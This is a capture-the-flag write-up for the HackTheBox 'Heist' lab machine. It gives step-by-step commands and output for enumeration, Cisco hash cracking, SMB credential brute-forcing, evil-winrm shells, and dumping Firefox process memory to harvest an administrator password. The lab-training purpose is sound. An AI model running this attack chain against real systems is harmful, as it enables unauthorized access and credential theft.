HackTheBoxHeist

Heist is a box labeled easy and contains practical enumeration techniques and attack vectors. Initial foothold is achieved by leveraging an improper security configuration.
Start by checking what ports are open:

nmap -sS -Pn -A 10.10.10.149
80/tcp  open  http          Microsoft IIS httpd 10.0
135/tcp open  msrpc         Microsoft Windows RPCc
445/tcp open  microsoft-ds?

Enumerate public files and folders on webserver

# dirb http://10.10.10.149

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Oct 19 18:27:44 2019
URL_BASE: http://10.10.10.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.149/ ----
==> DIRECTORY: http://10.10.10.149/attachments/                                                                                            
==> DIRECTORY: http://10.10.10.149/css/                                                                                                    
==> DIRECTORY: http://10.10.10.149/images/                                                                                                 
==> DIRECTORY: http://10.10.10.149/Images/                                                                                                 
+ http://10.10.10.149/index.php (CODE:302|SIZE:0)                                                                                          
==> DIRECTORY: http://10.10.10.149/js/  

Determine SMB version using metasploit. In this case SMB2 version is 255.2

msf5 auxiliary(scanner/smb/smb2) > exploit

[+] 10.10.10.149:445      - 10.10.10.149 supports SMB 2 [dialect 255.2] and has been online for 3671180 hours
[*] 10.10.10.149:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

CISCO 5 secrets are vulnerable to dictionary attacks. CISCO 5 secret found at http://10.10.10.149/attachments/config.txt is assembled in this format

cisco5.txt

enable_secret:$1$pdQG$o8nrSzsGXeaduXrjlvKc91

Then use John The Ripper is used to bruteforce the pass using wordlist rockyou.txt

# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt cisco5.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (enable_secret)
1g 0:00:00:21 DONE (2019-10-22 17:07) 0.04633g/s 162434p/s 162434c/s 162434C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Create a file with available users, users.txt and a file with available passwords, passwords.txt. Then use metaxploit scanner smb_login to see if any combinarion matches against the samba share discovered with nmap

# msfconsole
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhost 10.10.10.149
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /root/projects/heist/passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/projects/heist/users.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.149:445      - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Hazard:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Hazard:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Admin:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Admin:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Rout3r:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Rout3r:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\router:$uperP@ssword',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\router:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\router:stealth1agent',
[*] 10.10.10.149:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We notice one combination is successful

[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'

Using credentials, we list available shares

# smbclient -L 10.10.10.149 -U Hazard
Enter WORKGROUP\Hazard's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.

do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

Then list permissions for the shares. IPC appears available to user Hazard

# smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445	Name: 10.10.10.149                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	IPC$                                              	READ ONLY

Further enumerate using enum4linux. It revels a few more uses which we feed back into the login scanner

# enum4linux -u Hazard -p stealth1agent -a 10.10.10.149 2>/dev/null

S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)

Another valid user / pass combination is revealed

[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Chase:Q4)sJu\Y8qz*A3?d'
user: Chase
pass: Q4)sJu\Y8qz*A3?d

Connect using evil-winrm and newly discovered credentials

# ./evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> 

Get user hash

*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
a127daef77ab6d9d92008653295f59c4

Upload procdump64 to the host https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

Observe PIDs of firefox process running on the host

*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> ps|findstr fire
    358      25    16100     279180       1.28   6424   1 firefox                                                                                                                                                                                        
    390      31    38912     305376      34.13   6488   1 firefox                                                                                                                                                                                        
   1134      69   127720     465632      38.45   6624   1 firefox                                                                                                                                                                                        
    343      19    10008     266232       0.83   6760   1 firefox                                                                                                                                                                                        
    408      31    16964     294960       1.59   7104   1 firefox     

Execute dump of one of the Firefox processes. It will dump around 450MB

Procdump64 option -ma indicates writing a 'Full' dump file.

   -ma     Write a 'Full' dump file.
           Includes All the Image, Mapped and Private memory.
./procdump64.exe -accepteula -ma 6624

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[02:07:24] Dump 1 initiated: C:\Users\Chase\Documents\vrs\firefox.exe_191028_020724.dmp
[02:07:25] Dump 1 writing: Estimated dump file size is 467 MB.
[02:07:28] Dump 1 complete: 468 MB written in 3.7 seconds
[02:07:28] Dump count reached.

Search contents for string 'admin' and observe a new set of credentials

*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> Get-Content firefox.exe_191028_020724.dmp | Select-Sting 'admin'

ååååååxhttp://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=åååååååååååååååååååååxjar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/omni.ja!/modules/UrlbarValueFormatter.jsmåååååååå
u: admin@support.htb
p: 4dD!5}x/re8]FBuZ

Initiate a connection using newly found credentials. Read the key for root user, found on the user’s desktop

root@kali:~/projects/heist/evil-winrm# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
50dfa3c6bfd20e2e0d071b073d766897